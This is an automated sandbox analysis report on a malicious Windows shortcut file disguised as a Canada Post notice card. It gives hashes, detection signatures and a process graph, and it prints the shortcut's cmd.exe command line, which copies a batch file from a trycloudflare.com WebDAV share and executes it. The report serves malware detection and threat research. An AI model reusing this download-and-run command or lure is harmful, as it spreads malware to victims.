Windows Analysis Report
CanadaPostNoticeCard.download.lnk

Overview

General Information

Sample name: CanadaPostNoticeCard.download.lnk
Analysis ID: 1542731
MD5: 7ae270eb2a01528a4ca266ac565393d6
SHA1: 71d2f5f77bc5e46774046a29ab3502c198a4f559
SHA256: e983feab214d68fd7232c239dbe96aaa50c636972ed4840d70b4c4aea898cbff
Tags: CloudflareTunnelsRATlnkuser-JAMESWT_MHT
Infos:

Detection

Score: 60
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Machine Learning detection for sample
Windows shortcut file (LNK) contains suspicious command line arguments
Program does not show much activity (idle)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Copy From or To System Directory

Classification

AV Detection
barindex
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 83.0% probability
Machine Learning detection for sample
Source: CanadaPostNoticeCard.download.lnk Joe Sandbox ML: detected

System Summary
barindex
Windows shortcut file (LNK) contains suspicious command line arguments
Source: CanadaPostNoticeCard.download.lnk LNK file: /c copy /Y "\\stays-recipes-fold-day.trycloudflare.com@SSL\DavWWWRoot\bas.cmd" "%USERPROFILE%\Downloads\bas.cmd" & "%USERPROFILE%\Downloads\bas.cmd"
Source: classification engine Classification label: mal60.winLNK@2/0@0/0
Source: C:\Windows\System32\conhost.exe File read: C:\Users\desktop.ini Jump to behavior
Source: unknown Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c copy /Y "\\stays-recipes-fold-day.trycloudflare.com@SSL\DavWWWRoot\bas.cmd" "C:\Users\user\Downloads\bas.cmd" & "C:\Users\user\Downloads\bas.cmd"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Persistence and Installation Behavior
barindex
Windows shortcut file (LNK) starts blacklisted processes
Source: LNK file Process created: C:\Windows\System32\cmd.exe
Program does not show much activity (idle)
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Program does not show much activity (idle)
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1542731 Sample: CanadaPostNoticeCard.download.lnk Startdate: 26/10/2024 Architecture: WINDOWS Score: 60 10 Windows shortcut file (LNK) starts blacklisted processes 2->10 12 Machine Learning detection for sample 2->12 14 Windows shortcut file (LNK) contains suspicious command line arguments 2->14 16 AI detected suspicious sample 2->16 6 cmd.exe 1 2->6         started        process3 process4 8 conhost.exe 1 6->8         started       
No contacted IP infos